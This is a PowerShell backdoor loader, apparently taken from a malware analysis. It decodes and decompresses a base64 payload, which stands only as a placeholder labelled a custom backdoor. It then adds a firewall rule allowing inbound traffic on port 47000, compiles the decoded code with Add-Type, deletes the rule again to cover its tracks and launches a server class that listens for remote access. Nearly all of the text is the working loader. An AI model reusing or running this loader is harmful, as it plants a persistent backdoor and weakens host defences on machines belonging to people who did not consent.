$encfile = '<BASE64 ENCODED CUSTOM BACKDOOR>'
$DeflatedStream = New-Object IO.Compression.DeflateStream([IO.MemoryStream]
[Convert]::FromBase64String($encfile),[IO.Compression.CompressionMode]::Decompress)
$defilebytes = New-Object Byte[](34317)
$DeflatedStream.Read($defilebytes, 0, 34317) | Out-Null
$x = [System.Text.Encoding]::Default.GetString($defilebytes)
netsh advfirewall firewall delete rule name=powershell | out-null
netsh advfirewall firewall add rule name=powershell dir=in localport=47000 action=allow |
out-null
Add-Type $x
netsh advfirewall firewall delete rule name=powershell | out-null;
[xserver]::Main($args);
